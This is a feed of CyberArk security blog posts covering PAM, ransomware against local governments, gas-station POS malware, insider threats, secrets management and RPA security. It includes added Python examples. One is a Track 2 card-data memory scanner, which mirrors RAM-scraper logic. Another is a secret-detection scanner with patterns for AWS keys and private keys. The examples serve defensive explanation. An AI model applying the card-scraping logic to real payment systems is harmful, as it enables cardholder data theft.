After deploying a PAM solution, organizations can scan their systems to see the decrease in the number of unsecured and unprotected systems. Since any unmanaged privileged account is a potential attack vector, each privileged account that has been discovered, secured and protected by a PAM solution is a direct reduction in the exposed attack surface and proof of ROI.

Effective security starts with protecting an organization’s most valuable information, and as a common target in most cyber attacks, unmanaged and unprotected privileged access represents a significant threat. By locking down privileged credentials, organizations deprive attackers of their preferred routes to critical data and assets. Simultaneously, session monitoring and threat detection capabilities can help teams detect and investigate misuse of privileged credentials — improving an organization’s response time to in-progress attacks.

Furthermore, many PAM solutions can integrate with other enterprise software – from IoT device gateways, DevOps tools and network devices to vulnerability management systems – enhancing their value and streamlining security operations as a whole.

Want to learn more?  Check out CyberArk’s approach to Privileged Access Management or visit our resource center to find out more about the efficiency and security benefits of PAM.

]]>
Cyber Attacks Against State and Local Governments Surge https://www.cyberark.com/blog/cyber-attacks-against-state-and-local-governments-surge/ Thu, 09 Jan 2020 16:26:31 +0000 https://www.cyberark.com/?p=83232

Cyber attacks against state and local governments have been increasing dramatically. In 2019 alone, there were 140 ransomware attacks – nearly 3 per week – targeting public, state and local government and healthcare providers, up 65% from the previous year.

Just in the past month, four cities in the US were hit with ransomware infections. These cities, including New Orleans and Pensacola, Florida, all had essential government services sabotaged or halted. After the ransomware attack on New Orleans, the mayor was forced to declare a state of emergency. In Pensacola, the sanitation department lost email and telephone systems, internet servers and their online payment system.

Earlier in 2019, when an encrypting ransomware attack took Baltimore’s IT systems hostage, the attack froze thousands of government computers and disrupted everything from real estate sales to water bill payments. Even with the help of FBI, Secret Service and cybersecurity experts, the cost to the city will be astronomical at an estimated $18 million.

Cyber attacks against state and local governments show no sign of slowing in 2020. In fact, the Cybersecurity and Infrastructure Security Agency (CISA), a division of the Department of Homeland Security, recently released a statement urging vigilance against cyber attacks and encouraging the adoption of better cybersecurity practices.

That warning proved to be extremely timely. Over the past few days, the Texas Department of Information Resources has faced a spike in attempted cyber attacks, with 10,000 attempts to probe their systems occurring every minute.

What can state and local governments do to rise to meet this challenge? IT teams working for local agencies are often already making do with too few personnel and a stretched budget. So, while an improved cybersecurity posture is essential in the face of recent threats, it can be hard to figure out where to start.

So, start by protecting the most critical assets. Government entities frequently have access to a lot of personally identifiable information and other types of data that would be disastrous if an attacker got their hands on it. If privileged access to this data is kept safe, even in the case of a network breach, the most vital information would stay secure.

Privileged access is the gateway to these critical assets, and compromised privileged credentials have played a central role in almost every major targeted attack. That makes it a perfect starting place when it comes to securing state and local government systems against an ongoing tide of cyber attackers.  This is why the Center for Internet Security (CIS) has controlled use of administrative privileges as the fourth Basic CIS Control, only behind inventory and control of hardware and software assets and continuous vulnerability management.

Here is how a typical attack works: The cyber attacker starts by establishing a beachhead on the endpoint of the organization that they are aiming to breach. After gaining initial access and establishing persistence, the attacker escalates privileges to gain access to another system that brings them one step closer to their target. From there, the attacker can continue to move laterally until the target is reached, data is stolen, and operations are disrupted – or completely taken over.

By protecting the privileged credentials cyber attackers need, Privileged Access Management (PAM) provides security where it’s needed most. In the face of an onslaught of cyber attacks, state and local governments need more than ever to establish a proactive, sustainable cybersecurity program. Instead of getting overwhelmed, start with Privileged Access Management and keep the most vital assets protected.

It’s time to learn more about Privileged Access Management and staying safe from cyber attacks.

]]>
CISOs Weigh In On Managing Digital Transformation Risk https://www.cyberark.com/blog/cisos-weigh-in-on-managing-digital-transformation-risk/ Tue, 07 Jan 2020 14:00:52 +0000 https://www.cyberark.com/?p=82931

Around the world, companies in every industry are executing digital transformation initiatives to accelerate the pace of innovation, gain a leg up on the competition and improve business performance. As part of this push, they’re embracing DevOps methodologies, cloud platforms, and on-demand applications and services to increase business agility and improve economics. Meanwhile, advancements in artificial intelligence, the internet of things (IoT) and robotic process automation (RPA) are helping enterprises transform raw data into meaningful insights and improve productivity.

But, in an era of ubiquitous data, Chief Information Security Officers (CISOs) and security leaders face a host of new challenges their predecessors never encountered. In many ways, it’s like the Wild West as users access on-demand applications from any location using any device. In this uncharted territory, the risk to confidential data is expanding along with the cyberattack surface.

Security leaders recognize the urgency of a fresh approach to cybersecurity and risk management yet are struggling to drive change within their companies. A PwC Digital Trust Insights survey reveals that only 53 percent of companies take a proactive approach to cybersecurity by building risk management into digital transformation projects fully from the start.

Making decisions regarding risk management is a core function of the CISO, but they don’t always get the support they need to make those decisions stick. CISOs face a formidable challenge: they’re jockeying for executive mindshare and adequate funding for new programs, all while working to evolve long-standing corporate cultural practices and increase awareness.

Five Digital Transformation Secrets to Success from CISOs on the Front Lines

So how can security leaders overcome these issues and become accelerators for digital transformation? Together with PwC, we sat down with a number of CISOs who played an active role in transformation projects to understand their keys to success. Five common practices emerged from these conversations, which are outlined in a new whitepaper, Managing Risk in the Digital Era.

Among the revelations is the importance of assessing risk for each digital transformation project individually.

With threats coming from every angle, it’s difficult to prioritize cybersecurity projects and investments. Yet given ever-tightening budgets, CISOs are forced to make tradeoffs about which security projects and services they prioritize. The CISOs we spoke with stressed the need to assess risk on a project-by-project basis to effectively evaluate security and compliance concerns and make the best investment decisions.

According to one CISO of a major insurance provider, “There is no one-size-fits-all solution. We assess the risks of every project and every third-party provider individually, and make decisions accordingly.”

By taking a close look at each project, determining the type of data each application consumes, evaluating both internal and external threats and assessing all the systems and vendors involved across the entire application lifecycle, CISOs can reduce exposure and ensure security investments deliver the greatest return.

Other common practices successful CISOs employ to raise security awareness, tear down silos and improve digital transformation outcomes include:

  • Factor in security considerations from day one. By building strong relationships and working closely with technology leaders and line-of-business peers to ensure security is built into every project from the onset, CISOs can help the organization improve results.
  • Foster a security-first culture and mindset. CISOs who focus on improving communications and knowledge – from offering training courses to educating teams on the latest trends – are taking key steps to make security a core competency.
  • Weave security into DevOps systems and practices. CISOs should champion the integration of security into every phase of the DevOps process (i.e., automating security testing, integrating vulnerability analysis) to contain risk without slowing down the pace of development.
  • Improve communications with senior executives and the board. Learning how to communicate security risk in meaningful, relatable terms can help CISOs improve executive awareness and secure funding for critical cybersecurity initiatives.

By assessing each project individually, increasing cybersecurity awareness, building security into the corporate culture and improving executive-level communications, forward-looking CISOs are meeting digital transformation challenges head on. Download the whitepaper or tune in to our recent Data Breach Today podcast, “Digital Transformation: The Privileged Access Imperative” to learn more.

 

1© PwC. Not for further distribution without the prior written permission of PwC. PwC refers to the US member firm or one of its subsidiaries or affiliates, and may sometimes refer to the PwC network. Each member firm is a separate legal entity. Please see www.pwc.com/structure for further details.

 

POS Malware Exploits Weakness in Gas Station Networks https://www.cyberark.com/blog/pos-malware-exploits-weakness-in-gas-station-networks/ Fri, 20 Dec 2019 16:00:16 +0000 https://www.cyberark.com/?p=81642 Point-of-Sale Malware

Who would have thought that the riskiest part of your day would be gassing up your car? Risky for your wallet, anyway. Visa recently reported that gas stations across North America are facing a spree of cyber attacks in which attackers deploy point-of-sale (POS) malware on gas station networks to harvest payment card data. Over the course of November and December, Visa investigated at least five such incidents.

So why are gas stations in attackers' sights right now? They have found a weak spot in pay-at-the-pump transactions. The US is one of the last places in the world where magnetic stripe transactions are still widely accepted, and the stripe is far less secure than a chip-and-PIN card.

A chip-and-PIN card ties the card to the cardholder with a PIN, much as a debit card does, so a stolen card number on its own is not enough to complete an in-person chip transaction. The chip is also far harder to clone than a magnetic stripe: instead of handing over static track data on every swipe, it computes a unique cryptogram for each transaction, so what an attacker captures cannot be replayed to make a new card.

As of 2018, some 50% of general-purpose credit card transactions in the US still used the magnetic stripe, leaving around 20 billion transactions a year less secure than they could be. Many gas stations have installed chip-and-PIN readers inside the store but have not upgraded the readers on the pumps themselves, so every pump transaction falls back to the insecure stripe, even when the customer presents a chip-and-PIN card.

The weakness is at the pump, but the attack goes beyond the skimmers we are used to. The attackers deploy malware on a computer in the gas station back office and collect card data there. Here is how it works.

A magnetic stripe transaction starts at the pump when the cardholder swipes the card. The track data is sent from the pump to a back-office computer, which collects transactions from all the pump terminals at the station, decodes or decrypts them, holds them in memory and forwards them to the acquiring bank for authorization. If that computer is infected, the malware scrapes its process memory and harvests any transaction data that sits there in plaintext, card numbers included.

Transactions at the pump do fall under the Payment Card Industry Data Security Standard (PCI DSS), which requires that cardholder data be encrypted whenever it crosses open networks, that full magnetic stripe (track) data never be stored after authorization, and that the primary account number be rendered unreadable anywhere it is stored.

Unfortunately, practice often falls short of the standard: data on the back-office computer is frequently left in the clear or only loosely encoded, and even a compliant system has to hold the track data in plaintext in memory for the moment it takes to process a transaction. Track data read from a magnetic stripe carries no protection of its own, so whatever a memory scraper finds in that window is immediately usable by the attackers.
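The memory-scraping step described above is easy to reason about in code. The following Python is an added example, not from the original post and not CyberArk code: it models what a RAM scraper looks for in the back-office process, namely plaintext Track 2 records (`;PAN=YYMM` + service code + discretionary data + `?`), discards digit runs that fail the Luhn check, and reports the masked PAN. The byte buffer is constructed here to stand in for a memory snapshot, the PANs are standard test numbers, and the second buffer stands in for what the back office would hold if the pump encrypted track data end to end (point-to-point encryption), which is why nothing is found in it. The same scan, run by a defender against a copy of the payment process's memory, is a practical check for whether card data is sitting in the clear.

```python
import re

# Track 2 as it sits in memory: ;PAN=YYMM SSS <discretionary> ?
# PAN is 13-19 digits, '=' is the field separator, YYMM the expiry, SSS the service code.
TRACK2 = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")


def luhn_valid(pan: str) -> bool:
    """Luhn check-digit test; rejects most digit runs that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the first six and last four digits, the most PCI DSS allows to be displayed."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track2(buf: bytes) -> list:
    """Scan a memory buffer for plaintext Track 2 records with a Luhn-valid PAN."""
    hits = []
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode()
        if not luhn_valid(pan):
            continue
        hits.append({
            "offset": m.start(),
            "pan_masked": mask_pan(pan),
            "expiry": m.group(2).decode(),        # YYMM
            "service_code": m.group(3).decode(),
        })
    return hits


# Constructed stand-in for a snapshot of the back-office payment process's memory.
# The PANs are well-known test numbers, not real cards.
SAMPLE_MEMORY = (
    b"\x00\x17POSGW v3.2\x00pump=04\x00"
    b";4111111111111111=25121011234567890?"   # Track 2 with a test PAN, still in the clear
    b"\x00\x00approved\x00pump=05\x00"
    b";4111111111111112=2512101000?"          # fails Luhn: noise that only looks like a PAN
    b"\x00pump=07\x00"
    b";5555555555554444=26031015550000?"      # second plaintext record
    b"\x00\x8e\x17\xb0\xf4\x02\xaa\x5c\xee"   # arbitrary binary, no track data
)

# Constructed stand-in for a P2PE-protected back office: only ciphertext ever lands here.
CIPHERTEXT_ONLY = b"\x8e\x17\xb0\xf4\x02\xaa\x5c\xee\x91\x03\x7b\xd8\xc4\x61\xf0\x09"


if __name__ == "__main__":
    for hit in find_track2(SAMPLE_MEMORY):
        print(hit)
    print("ciphertext buffer:", find_track2(CIPHERTEXT_ONLY))
```

Run against the sample buffer the scan yields two records (the Luhn-invalid decoy is dropped) and nothing at all against the ciphertext buffer, which is the whole argument for encrypting at the pump rather than relying on the back office to keep plaintext short-lived.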

There are two ways to close this loophole: install chip-and-PIN readers on the pumps, or harden the back-office computer. The first means taking pumps out of service to overhaul the payment system; the second only requires installing software, so it is the faster win. It is not a substitute for the first, though: from October 2020, liability for counterfeit-card fraud at pumps that cannot take chip cards shifts from the card issuer to the gas station.

It is easy to overlook the security of a computer in a gas station back office, but since it handles card data it needs layered controls that go beyond encryption. Application control can stop the malware from executing in the first place, and enforcing least privilege makes it much harder for an attacker who does get onto the system to read another process's memory or reach the transaction data at all.

CyberArk Endpoint Privilege Manager is currently capable of blocking part of the memory scan and will be able to secure against the entire memory scan in a future release.

In the end, whether the gas stations decide to install better cybersecurity or overhaul their pump payment system, it likely won’t happen immediately. In the meantime, it may be safer to pay for your gas inside the store.

Privilege Cloud & Alero Updates Bolster CyberArk SaaS https://www.cyberark.com/blog/privilege-cloud-alero-updates-bolster-cyberark-saas/ Thu, 19 Dec 2019 16:49:07 +0000 https://www.cyberark.com/?p=81618 Privilege Access Management SaaS

Despite hitting staggering highs this year, the market for Software as a Service (SaaS) is forecast to reach $266.4B in 2020, up from $227B in 2019. This is no surprise: SaaS provides scalability and flexibility while limiting maintenance requirements and the need for on-premises infrastructure. Security SaaS solutions have emerged alongside it as a way for organizations to improve their overall security posture without putting more burden on administrators and end users.

As the global leader in privileged access management (PAM), we are committed to innovation across our portfolio of SaaS solutions, which includes Privilege Cloud, Alero and Endpoint Privilege Manager. Today we are announcing updates to the first two, Privilege Cloud and Alero, all focused on making it easier to reduce risk without introducing additional operational friction.

CyberArk Privilege Cloud

In case you are not familiar with it, CyberArk Privilege Cloud is our PAM as a Service offering, designed to protect, control and monitor privileged access for hybrid and cloud environments. We have added two substantial enhancements: one that helps secure application credentials and one that supports native session management workflows. Together they enable organizations to:

Secure Credentials Used by Applications and Other Non-Human Identities
Privilege Cloud now provides comprehensive privileged credential management for many widely-used applications, including commercial off-the-shelf (COTS) applications; third-party vulnerability scanners and tools, IT Service management software, and Robotic Process Automation solutions, as well as internally developed non-containerized custom applications. This new support reduces the significant risk associated with storing hard-coded credentials within COTS and custom applications and instead allows these applications to securely pull credentials managed by CyberArk.

CyberArk Privilege Cloud now supports a broad range of application environments and platforms, including application servers, Java, .NET and scripts running on a variety of operating systems including Linux and Windows. Building on the existing set of out-of-the-box plugins, customers can also take advantage of pre-built integrations for application credential management with Blue Prism, Forescout, Qualys, Rapid7, ServiceNow, Tenable, Automation Anywhere and UiPath, available on the CyberArk Marketplace.

Offer Native Access with New Session Management Capabilities

To help organizations reduce friction, privileged users can now use their preferred client, such as PuTTY, SecureCRT or MSTSC, for any SSH or RDP session managed by Privilege Cloud. This native access still comes with the session management, isolation, recording and audit trail that our customers expect.

CyberArk Alero

Launched earlier this year, CyberArk Alero is our newest SaaS offering, which provides secure remote vendor access for users who require privileged access to critical internal resources. Alero combines Zero Trust access, biometric authentication and just-in-time provisioning with CyberArk Core Privileged Access Security. The latest updates include:

REST API Support

CyberArk Alero now has comprehensive REST API support to automate common privileged tasks involved in securing third-party vendor access. This includes granting or removing CyberArk access for third-party users, inviting multiple vendors at once and retrieving audit data. REST API support also simplifies integration with IT Service Management and Identity Governance and Administration solutions. The result is operational efficiency: tasks that would otherwise sit on administrators' to-do lists and be handled manually can now be automated.

The world of SaaS moves quickly and we are continuing to create market leading solutions to help our customers scale, automate and simplify their PAM deployments. Want to learn more? Request a live demo here.

Privileged Access Abuse at Heart of Latest Insider Threats https://www.cyberark.com/blog/privileged-access-abuse-at-the-heart-of-latest-malicious-insider-incidents/ Wed, 18 Dec 2019 22:48:17 +0000 https://www.cyberark.com/?p=81309 Privilege Access Management PAM

While many companies spend a lot of energy protecting their business from external threats, security events initiated by insiders can be just as costly. Malicious insiders not only have intimate knowledge of corporate systems and infrastructure, but they also have something far more powerful: legitimate privileged access.

The challenge of insider threats is pervasive, and recent events show no sign of it slowing down. Whether it is a watershed case like Terry Childs, the former network administrator who locked the city of San Francisco out of its own network, or cases involving IP theft or fraud, privileged access abuse takes one of two forms. The first is when employees are granted more access than they need to do their jobs. The second is when someone with valid access uses privileged accounts to deliberately act against policy and abuse that power.

Regardless of the situation, the insider threat is ultimately a human challenge. Humans are unpredictable and it’s hard to foresee motivation. We want to trust the employees we hire – especially the ones who are given access to our most sensitive information. One key for companies is to understand who has privileged access, and consistently enforce the principle of least privilege – where employees are granted appropriate access to perform their jobs…no more, no less.

In addition, technology can help identify anomalous behavior and raise an alert when systems or information are accessed outside of policy. This adds another critical security layer that helps organizations detect the patterns and behaviors that signal privileged access abuse.
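One concrete form of that alerting is a policy check over privileged session records. The Python below is an added example, not from the original post and not CyberArk code: it takes a constructed log format (`timestamp user= role= account= target= ticket=`), an assumed role-to-target/account policy table and an assumed business-hours window, and emits an alert with the reasons whenever a session uses a target or account outside the role, happens off hours, or lacks a change ticket. A real deployment would source the policy from the PAM system's role definitions and the events from its session audit trail.

```python
from datetime import datetime

# Assumed role policy: which targets and which privileged accounts each role may use.
ROLE_POLICY = {
    "dba": {"targets": {"db-prod-01", "db-prod-02"}, "accounts": {"oracle"}},
    "netadmin": {"targets": {"fw-core-01", "fw-core-02"}, "accounts": {"admin"}},
}
BUSINESS_HOURS = (7, 19)   # privileged sessions are expected between 07:00 and 19:00 UTC


def parse_event(line: str) -> dict:
    """Parse one 'timestamp key=value ...' record into a dict; 'ts' becomes a datetime."""
    ts, _, rest = line.partition(" ")
    event = dict(kv.split("=", 1) for kv in rest.split())
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def evaluate(event: dict) -> list:
    """Return the list of policy violations for a single privileged session event."""
    policy = ROLE_POLICY.get(event["role"])
    if policy is None:
        return ["unknown_role"]
    reasons = []
    if event["target"] not in policy["targets"]:
        reasons.append("target_outside_role")
    if event["account"] not in policy["accounts"]:
        reasons.append("account_outside_role")
    if not (BUSINESS_HOURS[0] <= event["ts"].hour < BUSINESS_HOURS[1]):
        reasons.append("off_hours_session")
    if event.get("ticket", "-") == "-":       # '-' means no change ticket was attached
        reasons.append("no_change_ticket")
    return reasons


def detect(lines: list) -> list:
    """Run every record through the policy and collect the ones that violate it."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = evaluate(ev)
        if reasons:
            alerts.append({"user": ev["user"], "target": ev["target"],
                           "ts": ev["ts"].isoformat(), "reasons": reasons})
    return alerts


# Constructed session records (not real audit data).
LOG_LINES = [
    "2019-12-16T14:05:22Z user=jsmith role=dba account=oracle target=db-prod-01 ticket=CHG-4411",
    "2019-12-16T14:07:10Z user=jsmith role=dba account=root target=fw-core-01 ticket=CHG-4411",
    "2019-12-17T02:41:03Z user=mlee role=netadmin account=admin target=fw-core-01 ticket=-",
    "2019-12-17T09:15:47Z user=mlee role=netadmin account=admin target=fw-core-02 ticket=CHG-4420",
    "2019-12-17T10:02:00Z user=rpatel role=netadmin account=admin target=db-prod-01 ticket=-",
]

if __name__ == "__main__":
    for alert in detect(LOG_LINES):
        print(alert)
```

Three of the five constructed records trip the policy: a DBA using `root` against a firewall, an off-hours firewall session with no ticket, and a network administrator opening a session on a production database. None of these needs a signature; they are simply sessions the role definitions never authorized, which is the kind of signal a least-privilege baseline makes visible.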

While insider threat stories are certainly cautionary tales on unfettered privileged access for employees – the truth is that once an attacker is in a network it doesn’t matter if they are an attacker thousands of miles away or an employee three feet away – the risks are the same.

To be in the best position to mitigate these threats, organizations need to re-evaluate how they are securing and managing privileged access – not just to protect from the external attacker exploiting weaknesses, but also the malicious insider who might be working right under their noses.

How Security Keeps Up When Developers Drive Open Source https://www.cyberark.com/blog/how-security-keeps-up-when-developers-drive-open-source/ Thu, 12 Dec 2019 18:52:17 +0000 https://www.cyberark.com/?p=80964 Open Source Secrets Management

Open source is transforming software development. No longer do individual businesses need to purchase or build everything they need in-house. Instead, they can rely on a modern, interdependent ecosystem in which developers work together on mutually beneficial projects. This way, a single company doesn’t need to shoulder the entire development cost or have all the skills needed for the project.

But it hasn’t always been this way.

 The Enterprise Software Purchasing Shift: Proprietary to Freemium to Open Source

When it comes to software selection, purchasing and usage, a lot has changed over the past three decades.

In the 1980s, MS-DOS hit the market, quickly becoming the enterprise standard for computer technology. Soon after, Microsoft released Windows 1.0 and software companies like Oracle and SAP began making waves with their database products.

At that time, the CIO called the shots on what software the company would use, rarely consulting the technical users within the organization. Since each proprietary tool came with a hefty price tag, each purchasing decision was carefully considered, tools were tested and re-tested and it wasn’t uncommon for onboarding to take months – or even longer.

With the introduction of freemium models in the early 2000s, software became more open, accessible and easier to implement. While the CIO remained involved, decision making shifted to operations leads and organizations began adopting new applications that promised to streamline processes, boost productivity and enhance experiences.

Fast-forward 10 years, and the top-down decision making model was replaced by a bottom-up model. As organizations felt increasing pressure to build and deliver software and services better and faster, developers and other technical users began to take matters into their own hands. To meet ever-growing expectations, they required carte blanche access to tools that could help them automate the CI/CD pipeline, build and deploy apps at scale and solve new challenges – fast.

Free, open source software was the “perfect” solution. Since it didn’t require licensing, developers could deploy it quickly without involving senior IT leadership (and, often, completely without their knowledge). And given developers’ growing clout within organizations, open source usage increasingly became an accepted norm, empowering DevOps teams to push the boundaries of innovation and propel digital transformation initiatives. It’s estimated that 78 percent of all enterprises use open source software today.

The Open Source Security Challenge: Shortcuts for Handling Secrets Abound

Security teams recognize this shift in decision making, but are often left on the outside looking in. In the drive to produce code faster, DevOps teams often do not consult with security teams before adopting the latest, greatest open source tools. This can lead to insecure practices such as:

  • Embedding secrets – such as credentials for sensitive databases or cloud access keys – in applications and configuration files. Fueled by the growing sense of community around developers’ work, the risks associated with embedded secrets are heightened by the push to share code outside of the organization. While sharing code is well intended and brings important benefits, it may expose secrets and other confidential information embedded in the code, leaving the organization vulnerable to attack.
  • Re-using third-party code without sufficient scrutiny or attention to updates. In fact, 31 percent of organizations suspect or have verified a breach related to open source components in the last year.
  • Selecting and using an open source tool before evaluating it for potential security issues, particularly the tool’s ability to handle secrets securely.
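To make the first of those shortcuts concrete, the scanner below is an added example, not from the original post and not Conjur or any CyberArk tool. It walks a handful of constructed files, flags an AWS access key ID, a credential assigned in code, a quoted high-entropy literal and a PEM private key header, and deliberately ignores references to injected secrets such as `${API_KEY}` and `os.environ[...]`, which is what the code should look like once secrets are pulled from a secrets manager instead of being embedded. The sample file contents, the pattern table and the entropy threshold are assumptions chosen for the illustration; the AWS values are the example credentials used throughout the AWS documentation, not live keys.

```python
import math
import re

# Detection patterns, checked in order; the first hit on a line wins.
# Group 1 carries the matched value.
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\b(AKIA[0-9A-Z]{16})\b")),
    ("private_key_block", re.compile(r"(-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)")),
    ("credential_assignment", re.compile(
        r"(?i)(?:password|passwd|pwd|secret|api[_-]?key|token)[A-Za-z0-9_]*\s*[=:]\s*['\"]?([^'\"\s,]+)")),
    ("high_entropy_string", re.compile(r"['\"]([A-Za-z0-9+/=_-]{24,})['\"]")),
]

# Values that merely point at a secret injected at runtime are not findings.
PLACEHOLDER = re.compile(
    r"^(?:\$\{?[A-Za-z_][A-Za-z0-9_]*\}?|os\.environ|<[^>]+>|\*{3,}|changeme)", re.I)

ENTROPY_THRESHOLD = 3.5   # bits per character; a random 32-character key scores about 5


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character of the string."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value: str) -> str:
    """Never echo the whole secret back into a report or a log line."""
    return value[:4] + "..." if len(value) > 4 else "..."


def scan_text(path: str, text: str) -> list:
    """Scan one file's contents and return the findings, one per offending line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            value = m.group(1)
            if kind == "credential_assignment" and PLACEHOLDER.match(value):
                continue   # ${VAR}, os.environ[...] and similar are references, not secrets
            if kind == "high_entropy_string" and shannon_entropy(value) < ENTROPY_THRESHOLD:
                continue   # long but low-entropy literal (a path, a constant name)
            findings.append({"file": path, "line": lineno, "kind": kind, "sample": redact(value)})
            break
    return findings


def scan_files(files: dict) -> list:
    """Scan a mapping of path -> contents, in order."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


# Constructed sample repository. The AKIA.../wJalr... pair is AWS's documented example, not a real key.
SAMPLE_FILES = {
    "config/app.yml": (
        "database:\n"
        "  host: db.internal\n"
        '  password: "Sup3rS3cret!"\n'      # embedded credential: finding
        "  api_key: ${API_KEY}\n"           # injected at deploy time: not a finding
    ),
    "deploy/settings.py": (
        'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n'
        'AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"\n'
        'HMAC_SALT = "Zk9pN2xq8Qw3Vr5TbH1cYe6Du4SgLmAf"\n'
        'DB_PASSWORD = os.environ["DB_PASSWORD"]\n'
        "# password policy: minimum 12 characters\n"
    ),
    "deploy/id_rsa": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "MIIEpAIBAAKCAQEA0example\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']} {f['kind']} ({f['sample']})")
```

Run as a pre-commit hook or a CI step, a scanner like this catches the embedded secret before the code is shared; the placeholder rule is what keeps it from flagging the fixed version, where the secret lives in a secrets manager and the code only carries a reference.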

Unfortunately, most conventional security management solutions and practices are designed to support traditional software applications and development methodologies and are far too slow and complex for the fast-paced world of open source software, microservices, containers, orchestrators and serverless technology.

Security leaders understand DevOps requires a fresh approach to security that mitigates risk and uncertainty without impairing velocity. Now, security leaders are looking for ways to empower developers to use open source tools more securely.

Four Ways to Empower Developers with Open Source Secrets Management

CyberArk Conjur is an open source security service for controlling privileged access to critical systems. It works to secure secrets (i.e., passwords, SSH keys, certificates and API keys) used by non-human identities and users in CI/CD environments and across open source tools, making it easy for DevOps teams to embed security into existing workflows.

Security teams are introducing open source secrets management to their development counterparts and are gaining traction with four key use cases:

  1. Secure CI/CD pipelines. Popular automation and configuration tools like Jenkins, Ansible, Puppet and Chef require secrets to access protected resources like databases, SSH servers and HTTPS services. Yet these secrets are often hard-coded or stored insecurely in configuration files or code. CyberArk Conjur removes these hard-coded secrets from open source DevOps tools across the CI/CD pipeline, while providing full audit trails, policy-defined role-based access control (RBAC) and secrets rotation.
  2. Secure and authenticate containers. Containers have solved a lot of problems for DevOps and engineering teams by improving portability and speed. But their ephemeral nature makes it difficult to identify and determine access rights. CyberArk Conjur strongly authenticates container requests for secrets with native container attributes and manages secrets with RBAC policy. 
  3. Manage elastic and auto-scale environment secrets. Cloud providers offer auto-scaling capabilities to support elasticity and pay-as-you-grow economics. But, the dynamic nature of cloud auto-scaling creates security management challenges for organizations. When a new host comes online, the owner of the host can manually set permissions, but this human interaction doesn’t scale. CyberArk Conjur automates the identity enrollment of new hosts using strong authentication.
  4. Eliminate multi-cloud, multi-tool security islands. Secrets are typically maintained and administered separately, using different systems (or “security islands”), which makes it difficult to share secrets and institute uniform security policies. CyberArk Conjur centrally authenticates, controls and audits non-human access across leading tool stacks, container platforms and cloud environments with robust secrets management to help streamline operations and improve compliance.

With open source secrets management, developers can continue to do what they love without having to handle secrets themselves. And for organizations with expanding enterprise requirements, CyberArk Application Access Manager provides a comprehensive solution for securing secrets and other credentials in DevOps environments.

Interested in Open Source, DevOps, or Labs research?  Join the Conversation on the CyberArk Commons!

If you’re interested in open source projects like Conjur, join the conversation on the CyberArk Commons Community.  The CyberArk Commons Community is an open source community dedicated to developers, engineers, cybersecurity researchers and other technically minded people. Visit the CyberArk Commons discussion forum and join in.

5 Best Practices for Robotic Process Automation Security https://www.cyberark.com/blog/5-best-practices-for-robotic-process-automation-security/ Tue, 10 Dec 2019 14:00:46 +0000 https://www.cyberark.com/?p=80676 RPA Security

Robotic process automation (RPA) is a powerful technology that streamlines and standardizes many process-oriented tasks. It is gaining traction around the globe and is now widely viewed as a core component of digital transformation initiatives. Applied to the right processes, RPA software robots can significantly improve productivity, quality and the accuracy of data and compliance, while empowering human workers to focus on more strategic and fulfilling work.

More than 78 percent of respondents to the CyberArk Global Advanced Threat Landscape 2019 Report say they are already investing in RPA technology or plan to invest or increase their investment over the coming year. A corroborating BluePrism study shows that 94 percent of business decision-makers understand the benefits RPA can bring to their business, with the vast majority (92 percent) planning to extend automation use cases.

According to the same BluePrism study, one-third of businesses around the world are currently automating between 20 and 29 tasks, and nearly a quarter are automating more than 40 tasks. These levels of adoption are not confined to single departments, RPA advocates are sharing their knowledge and building enthusiasm and support across the enterprise.

RPA Security and the Privileged Pathway in RPA

To perform automated functional tasks, this new digital workforce requires privileged access and credentials to connect to target systems and other applications, such as financial systems, ERP, CRM, supply chain and logistics systems – and even email. When these privileged credentials are left unsecured, they can become vulnerable to targeted, credential-based cyber attacks.

Since robots can be generated automatically, the number deployed within an organization can grow rapidly, and that number may change frequently, compounding the security risk. The privileged account credentials that robot scripts use can dramatically expand the attack surface if they are stored insecurely. The risk is greater still for unattended robots, which run without a human operator present and are often deployed with shared credentials.

As RPA deployments surge and the number of software robots continues to expand, organizations are searching for ways to marry automation with enforceable security practices that can help protect RPA investments while also recognizing faster time to value.

Five RPA Security Best Practices for Privileged Credentials and Access

Protecting software robots' privileged credentials and access should follow the same security standards used for human users and applications, such as enforcing the principle of least privilege. There are, however, a few implementation details specific to RPA technology and the robot lifecycle that also need attention, for instance removing hard-coded credentials from robot scripts. Watch the whiteboard video below to learn five security best practices businesses should consider incorporating into their RPA workflows.

 

 

We’re only at the beginning of how RPA technology will transform businesses, but, as with most innovations, RPA can significantly expand the attack surface if not implemented properly. CyberArk can help you secure privileged account credentials used in RPA platforms and the expanding deployments of software robots.

CyberArk integrates seamlessly with more RPA solutions than any other privileged access management (PAM) vendor on the market. To see an integration in action, check out this recent webinar with BluePrism. And to dig deeper, visit our website or read this solution brief.

 

Third Party Access is a Top 10 Organizational Risk https://www.cyberark.com/blog/third-party-access-is-a-top-10-organizational-risk/ Thu, 05 Dec 2019 14:00:26 +0000 https://www.cyberark.com/?p=80553 Third Party Access

Nearly every organization today relies on a variety of remote third party vendors to access, maintain and support critical internal systems and resources. These vendors have come to play a critical role in maintaining modern organizations’ complex and distributed enterprise infrastructures.

